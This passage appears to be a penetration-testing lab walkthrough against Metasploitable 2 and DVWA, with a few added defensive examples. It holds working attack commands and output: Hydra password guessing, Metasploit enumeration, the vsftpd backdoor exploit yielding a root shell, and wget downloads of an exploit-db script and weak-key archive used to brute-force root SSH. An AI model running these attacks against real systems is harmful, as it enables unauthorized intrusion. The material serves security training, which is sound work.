[DATA] attacking http-get-form://10.10.10.101:80/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.
[80][http-get-form] host: 10.10.10.101   login: admin   password: password
[STATUS] attack finished for 10.10.10.101 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-03-27 11:27:15
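Seen from the web server, the run above is eight requests to the same login path from one client within a couple of seconds, and because the form uses GET, every guessed password lands in the access log. The following is an added example, not part of the original post, that reads Apache combined-format access logs and reports any client that hits the login path at least N times within one clock minute. The log lines are constructed for the demo (the request path is the one used above; the user-agent string is hydra's default, which the rule deliberately ignores because it is trivially changed).

```shell
#!/bin/sh
# Added example (not from the original post): flag a login-guessing burst against the
# DVWA brute-force page in Apache access logs. All log lines below are constructed.
ACCESS_LOG='10.10.10.50 - - [27/Mar/2019:11:26:58 -0400] "GET /dvwa/index.php HTTP/1.1" 200 1833 "-" "Mozilla/5.0"
10.10.10.100 - - [27/Mar/2019:11:27:14 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:14 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=12345678&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:14 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=qwerty&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:14 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=letmein&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:15 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:15 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=welcome&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:15 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=monkey&Login=Login HTTP/1.0" 200 4234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.100 - - [27/Mar/2019:11:27:15 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.0" 200 4301 "-" "Mozilla/4.0 (Hydra)"
10.10.10.50 - - [27/Mar/2019:11:27:20 -0400] "GET /dvwa/vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4301 "-" "Mozilla/5.0"'

# detect_login_bursts THRESHOLD PATH: read combined-format access log on stdin and print
# "client minute count" for every client that requested PATH at least THRESHOLD times
# within one clock minute. Field 1 is the client, field 4 is "[dd/Mon/yyyy:HH:MM:SS",
# field 7 is the request target (path plus query string).
detect_login_bursts() {
    awk -v threshold="$1" -v path="$2" '
        $7 ~ ("^" path) {
            minute = substr($4, 2, 17)
            count[$1 " " minute]++
        }
        END {
            for (k in count) if (count[k] >= threshold) print k, count[k]
        }'
}

printf '%s\n' "$ACCESS_LOG" | detect_login_bursts 5 /dvwa/vulnerabilities/brute/
```

Counting per client and minute keeps the single legitimate login from 10.10.10.50 below the threshold while the eight-request burst from 10.10.10.100 is reported. The same log also shows why credentials should never travel in a GET query string: the successful password is sitting in plain text in the web server's own log.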

Command Execution

Entering the loopback address (127.0.0.1) produces output from the ping command. The View Source button at the bottom of the page reveals the source code:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST["ip"];

    $target = stripslashes( $target );

    // Split the IP into 4 octets
    $octet = explode(".", $target);

    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) {

        // If all 4 octets are int's put the IP back together.
        $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];

        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) {

            $cmd = shell_exec( 'ping  ' . $target );
            echo '<pre>'.$cmd.'</pre>';

        } else {

            $cmd = shell_exec( 'ping  -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';

        }

    }

    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }

}

?>

We can append & followed by the command we want to execute, but according to the source code the $target value is split on "." into four octets, each octet must pass is_numeric, and the address is then rebuilt from those four octets before it reaches shell_exec. So we would need to encode our command in such a way that each piece passes the is_numeric test. We checked the PHP function at https://www.php.net/manual/en/function.is-numeric.php in an attempt to understand it a bit better. I thought there might be a clue in the fact that since version 7 of PHP hexadecimal strings are no longer is_numeric. After a couple of days of trying various injections to convert commands into numeric strings I gave up and looked at the source at https://github.com/ethicalhack3r/DVWA/tree/master/vulnerabilities/exec/source. Looking at the different levels and the help file, the impossible.php level is probably not exploitable: anything appended to the address either fails the numeric check or is discarded when the address is reassembled from the validated octets.
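As an added illustration (this is not DVWA's code nor the walkthrough's own), the following Python models both the unvalidated ping handler and the octet-checked one shown above, so you can see which inputs survive to the shell. The is_numeric model is an approximation written for this example; it deliberately leaves out hexadecimal strings.

```python
import re

# Approximation of PHP 5's is_numeric(): optional leading whitespace, optional
# sign, digits with optional fraction and exponent, and nothing trailing.
# Assumption: hex strings (accepted by PHP 5, rejected since PHP 7) are left out.
_PHP_NUMERIC = re.compile(r"[ \t\n\r\x0b\x0c]*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\Z")


def php_is_numeric(value: str) -> bool:
    """Model of is_numeric() for the inputs that matter here."""
    return _PHP_NUMERIC.match(value) is not None


def build_ping_unvalidated(target: str) -> str:
    """Unvalidated handler: whatever the user typed is glued onto the command
    line, so '127.0.0.1&id' becomes two shell commands."""
    return "ping -c 3 " + target


def build_ping_octet_checked(target: str):
    """Model of the handler shown above: split on '.', require exactly four
    is_numeric octets, then rebuild the address from those octets only.
    Returns the command string, or None when the input is rejected."""
    octets = target.split(".")
    if len(octets) != 4 or not all(php_is_numeric(o) for o in octets):
        return None
    rebuilt = octets[0] + "." + octets[1] + "." + octets[2] + "." + octets[3]
    return "ping -c 3 " + rebuilt


def shell_metacharacters(command: str) -> set:
    """Which characters in the final command the shell would interpret."""
    return set(command) & set("&|;`$()<>\n")


if __name__ == "__main__":
    for attempt in ["127.0.0.1", "127.0.0.1&id", "127.0.0.1;id", "1.2.3.4.5", "\n127.0.0.1"]:
        print(repr(attempt), "->", repr(build_ping_octet_checked(attempt)))
```

The only thing that slips past the check is leading whitespace on an octet (is_numeric tolerates it), and even then the rebuilt string contains nothing but digits, dots and whitespace, so no attacker-controlled command word ever reaches shell_exec.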

CSRF

Port 111 et al.

rpcbind listens on both TCP and UDP port 111, so we run a separate nmap scan against that port. Since rpcbind maps RPC program numbers to the ports their services listen on, we can query it (the rpcinfo script does this for us) to identify those services and their ports.

root@kali:~# nmap -A -sT -sU -p 111 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 18:25 EDT
Nmap scan report for 10.10.10.101
Host is up (0.00098s latency).

PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      34832/udp  mountd
|   100005  1,2,3      47474/tcp  mountd
|   100021  1,3,4      42100/udp  nlockmgr
|   100021  1,3,4      51622/tcp  nlockmgr
|   100024  1          34009/tcp  status
|_  100024  1          45223/udp  status
111/udp open  rpcbind 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      34832/udp  mountd
|   100005  1,2,3      47474/tcp  mountd
|   100021  1,3,4      42100/udp  nlockmgr
|   100021  1,3,4      51622/tcp  nlockmgr
|   100024  1          34009/tcp  status
|_  100024  1          45223/udp  status
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 10.10.10.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

Port 2049

For some reason the showmount command is missing from Kali, and whilst looking for it using dpkg -S showmount, I located an nmap script that lists exported mount points. I executed the script against port 111, since the script asks the portmapper for mountd's port and then queries mountd directly.

root@kali:~# nmap --script /usr/share/nmap/scripts/nfs-showmount.nse -p 111 -n -v 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-05 15:00 AEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Initiating ARP Ping Scan at 15:00
Scanning 10.10.10.101 [1 port]
Completed ARP Ping Scan at 15:00, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:00
Scanning 10.10.10.101 [1 port]
Discovered open port 111/tcp on 10.10.10.101
Completed SYN Stealth Scan at 15:00, 0.03s elapsed (1 total ports)
NSE: Script scanning 10.10.10.101.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.03s elapsed
Nmap scan report for 10.10.10.101
Host is up (0.00046s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  / *
MAC Address: 00:0C:29:FA:DD:2A (VMware)

NSE: Script Post-scanning.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@kali:~# 

It appears that the root directory (/) is exported to all hosts (*).

Port 139 and 445

The initial port scan indicated that Samba was running on the target host, with ports 139 and 445 open. We can attempt to connect to the host anonymously and list its shares.

root@kali:~# smbclient -L 10.10.10.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            METASPLOITABLE
root@kali:~# 

Port 512-514

Unix r-services are common on commercial platforms, including Solaris, HP-UX, and AIX, and are also available on the Metasploitable target machine. Each r-service uses standard PAM username and password authentication, which is overridden by ~/.rhosts and /etc/hosts.equiv entries that define trusted hosts and usernames. From a Unix-based platform, the rsh, rlogin, and rexec clients are used to access the respective r-services running on a remote host. (Refer: http://etutorials.org/Networking/network+security+assessment/Chapter+7.+Assessing+Remote+Maintenance+Services/7.4+R-Services/) Since we have a list of Metasploitable user names, we can try each of them to see whether any account trusts us through a misconfigured entry.

I searched the web for exploits against rshd. Although https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rsh_login was frequently recommended, the scanner did not yield any successful results.

Port 1099

This appears to be a Java RMI registry. RMI allows instances of Java classes (objects) in one JVM to invoke methods on objects in another JVM. RMI can also load classes from a remote source (a codebase URL) and instantiate them within the JVM, which is the behaviour the exploit module used later relies on.

root@kali:~# nmap -n -vv -p 1099 -A 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 19:53 AEST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating ARP Ping Scan at 19:53
Scanning 10.10.10.101 [1 port]
Completed ARP Ping Scan at 19:53, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:53
Scanning 10.10.10.101 [1 port]
Discovered open port 1099/tcp on 10.10.10.101
Completed SYN Stealth Scan at 19:53, 0.03s elapsed (1 total ports)
Initiating Service scan at 19:53
Scanning 1 service on 10.10.10.101
Completed Service scan at 19:53, 6.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.101
NSE: Script scanning 10.10.10.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for 10.10.10.101
Host is up, received arp-response (0.00064s latency).
Scanned at 2018-08-06 19:53:25 AEST for 7s

PORT     STATE SERVICE  REASON         VERSION
1099/tcp open  java-rmi syn-ack ttl 64 Java RMI Registry
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/6%OT=1099%CT=%CU=31796%PV=Y%DS=1%DC=D%G=N%M=000C29%T
OS:M=5B681A9C%P=x86_64-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=D5%TI=Z%CI=Z%II=I%T
OS:S=7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=
OS:M5B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 1.976 days (since Sat Aug  4 20:27:59 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: localhost

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 10.10.10.101

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds
           Raw packets sent: 21 (1.670KB) | Rcvd: 18 (1.434KB)
root@kali:~# 

We can search Metasploit for Java RMI related modules and run them: first to enumerate the names bound in the registry, then to check whether the endpoint allows remote class loading.

msf > search java_rmi

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/gather/java_rmi_registry                               normal     Java RMI Registry Interfaces Enumeration
   auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     Java RMI Server Insecure Endpoint Code Execution Scanner
   exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  Java RMIConnectionImpl Deserialization Privilege Escalation
   exploit/multi/misc/java_rmi_server              2011-10-15       excellent  Java RMI Server Insecure Default Configuration Java Code Execution


msf > use auxiliary/gather/java_rmi_registry
msf auxiliary(gather/java_rmi_registry) > show options

Module options (auxiliary/gather/java_rmi_registry):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  1099             yes       The target port (TCP)

msf auxiliary(gather/java_rmi_registry) > set RHOST 10.10.10.101
RHOST => 10.10.10.101
msf auxiliary(gather/java_rmi_registry) > run

[*] 10.10.10.101:1099 - Sending RMI Header...
[*] 10.10.10.101:1099 - Listing names in the Registry...
[-] 10.10.10.101:1099 - Names not found in the Registry
[*] Auxiliary module execution completed
msf auxiliary(gather/java_rmi_registry) > back
msf > set RHOST 10.10.10.101
RHOST => 10.10.10.101
msf > use auxiliary/scanner/misc/java_rmi_server
msf auxiliary(scanner/misc/java_rmi_server) > show options

Module options (auxiliary/scanner/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    1099             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(scanner/misc/java_rmi_server) > set RHOSTS 10.10.10.101
RHOSTS => 10.10.10.101
msf auxiliary(scanner/misc/java_rmi_server) > set THREADS 32
THREADS => 32
msf auxiliary(scanner/misc/java_rmi_server) > run

[+] 10.10.10.101:1099     - 10.10.10.101:1099 Java RMI Endpoint Detected: Class Loader Enabled
[*] 10.10.10.101:1099     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/misc/java_rmi_server) > 

Port 1524

According to nmap this is a bind shell left on the Metasploitable host. It is not a software vulnerability as such, so there is nothing to look up, but write-ups on the web suggest that simply connecting to the port with telnet is sufficient to obtain a root shell on the target.

Port 2121

We identify ProFTPD running on the target and listening on port 2121.

root@kali:~# nmap -A -sV -p2121 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 23:12 AEST
Nmap scan report for 10.10.10.101
Host is up (0.00068s latency).

PORT     STATE SERVICE VERSION
2121/tcp open  ftp     ProFTPD 1.3.1
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 10.10.10.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.37 seconds

Searching the web for ProFTPD vulnerabilities, we find https://www.cvedetails.com/vulnerability-list/vendor_id-9520/product_id-16873/version_id-72426/Proftpd-Proftpd-1.3.1.html. We also search Metasploit for exploits against ProFTPD, and come up with the following.

msf > search proftp

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
   exploit/windows/ftp/proftp_banner            2009-08-25       normal     ProFTP 2.9 Banner Remote Buffer Overflow

I cannot find anything specific to version 1.3.1, so this service may instead be a candidate for a brute-force attempt using our username list and the cracked passwords list.

Port 3306

Port 3306 is usually used by MySQL. We can confirm this using nmap.

root@kali:~# nmap -p 3306 -A 10.10.10.101 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 02:03 AEST
Nmap scan report for 10.10.10.101
Host is up (0.00098s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 10
|   Capabilities flags: 43564
|   Some Capabilities: SupportsCompression, Support41Auth, Speaks41ProtocolNew, LongColumnFlag, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsTransactions
|   Status: Autocommit
|_  Salt: C3tqYMR4K^w^NNz?it*n
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 10.10.10.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.29 seconds
root@kali:~# 

Searching for vulnerabilities in this version of MySQL, we find https://www.cvedetails.com/vulnerability-list/vendor_id-185/product_id-316/version_id-61896/Mysql-Mysql-5.0.51a.html, as well as https://www.exploit-db.com/exploits/19092/.

Port 3632

Port 5432

Port 5900

Port 6000

Port 6667

Port 6697

Port 8009

Port 8180

Port 8787

Port 34009

Port 35709

Port 47474

Port 51622

Exploitation

The exploitation of the services using the Metasploit framework is summarised below.

Port 21

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.101
RHOST => 10.10.10.101
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.101     yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.101:21 - USER: 331 Please specify the password.
[+] 10.10.10.101:21 - Backdoor service has been spawned, handling...
[+] 10.10.10.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.10.10.100:45063 -> 10.10.10.101:6200) at 2018-07-27 12:24:57 -0400

id
uid=0(root) gid=0(root)
hostname
metasploitable

Port 22

We check whether the SSH service accepts one of the known weak (blacklisted) key pairs produced by the Debian OpenSSL predictable-PRNG bug: exploit-db 5720 is the brute-force script and 5622 is the archive of pre-generated keys it iterates over.

root@kali:~/metasploitable2/5662# wget https://www.exploit-db.com/download/5720.py -O 5720.py 
--2018-07-28 16:18:23--  https://www.exploit-db.com/download/5720.py
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4353 (4.3K) [application/txt]
Saving to: ‘5720.py’

5720.py                          100%[=======================================================>]   4.25K  --.-KB/s    in 0s      

2018-07-28 16:18:24 (38.4 MB/s) - ‘5720.py’ saved [4353/4353]

root@kali:~/metasploitable2/5662#
root@kali:~/metasploitable2/5622# wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 -O 5622.tar.bz2
--2018-07-28 16:19:43--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.255.112, 192.30.255.113
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/bin-sploits/5622.tar.bz2 [following]
--2018-07-28 16:19:44--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/bin-sploits/5622.tar.bz2
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.96.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.96.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: ‘5622.tar.bz2’

5622.tar.bz2                     100%[=======================================================>]  47.90M  2.16MB/s    in 22s     

2018-07-28 16:20:25 (2.17 MB/s) - ‘5622.tar.bz2’ saved [50226987/50226987]

root@kali:~/metasploitable2/5622# bunzip2 5622.tar.bz2 
root@kali:~/metasploitable2/5622# tar xvf 5622.tar 
rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub
<snip>
root@kali:~/metasploitable2/5622# python 5720.py rsa/2048/ 10.10.10.101 root 22 20

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 110 keys | Remaining 32658 keys | Aprox. Speed 22/sec
Tested 224 keys | Remaining 32544 keys | Aprox. Speed 22/sec
Tested 337 keys | Remaining 32431 keys | Aprox. Speed 22/sec
<snip>
Tested 9330 keys | Remaining 23438 keys | Aprox. Speed 29/sec
Tested 9445 keys | Remaining 23323 keys | Aprox. Speed 23/sec
Tested 9556 keys | Remaining 23212 keys | Aprox. Speed 22/sec

Key Found in file: 57c3115d77c56390332dc5c49978627a-5429
Execute: ssh -lroot -p22 -i rsa/2048//57c3115d77c56390332dc5c49978627a-5429 10.10.10.101

Tested 9618 keys | Remaining 23150 keys | Aprox. Speed 12/sec
root@kali:~/metasploitable2/5622#
root@kali:~/metasploitable2/5622# ssh -lroot -p22 -i rsa/2048//57c3115d77c56390332dc5c49978627a-5429 10.10.10.101
Last login: Fri Jul 27 07:38:09 2018 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#
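As an added example (not from the exploit-db scripts above nor the walkthrough's own commands), the following Python shows the shortcut a practitioner would reach for instead of a roughly 25-minute brute force over 32768 keys: compute the MD5 fingerprint of a public key line and look it up in an index of the key archive. It assumes the archive's file names are of the form <MD5 fingerprint>-<pid>, as the listing above suggests, and that the target's /root/.ssh/authorized_keys can be read (for instance over the NFS export covered later). Both keys in the code are constructed and are not real weak keys.

```python
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(value: int) -> bytes:
    """SSH wire 'mpint': big-endian magnitude with a leading 0x00 when the top
    bit is set, so the number is not read as negative."""
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def rsa_public_blob(e: int, n: int) -> bytes:
    """The base64 blob in an 'ssh-rsa AAAA... comment' line decodes to
    string("ssh-rsa") || mpint(e) || mpint(n)."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def md5_fingerprint(pubkey_line: str) -> str:
    """32 hex characters: MD5 over the decoded blob, which is what
    'ssh-keygen -l -E md5' prints (with colons) for the key."""
    blob = base64.b64decode(pubkey_line.split()[1])
    return hashlib.md5(blob).hexdigest()


def index_weak_keys(paths):
    """Map fingerprint -> private key path for archive entries named
    '<fingerprint>-<pid>.pub' (assumed naming, taken from the listing above)."""
    index = {}
    for path in paths:
        if path.endswith(".pub"):
            private = path[:-len(".pub")]          # private key: same name, no .pub
            fingerprint = private.rsplit("/", 1)[-1].split("-")[0]
            index[fingerprint] = private
    return index


def find_matching_private_key(authorized_key_line: str, index):
    """Look a target's authorized key up in the index; None if it is not weak."""
    return index.get(md5_fingerprint(authorized_key_line))


# Constructed data: neither modulus is a real weak key, they only exercise the code.
_N_WEAK = (2 ** 127 - 1) * (2 ** 89 - 1)
_N_OTHER = (2 ** 107 - 1) * (2 ** 61 - 1)
WEAK_KEY_LINE = "ssh-rsa " + base64.b64encode(rsa_public_blob(65537, _N_WEAK)).decode() + " root@metasploitable"
OTHER_KEY_LINE = "ssh-rsa " + base64.b64encode(rsa_public_blob(65537, _N_OTHER)).decode() + " someone@elsewhere"
ARCHIVE_LISTING = [                                 # constructed stand-in for tar tf 5622.tar
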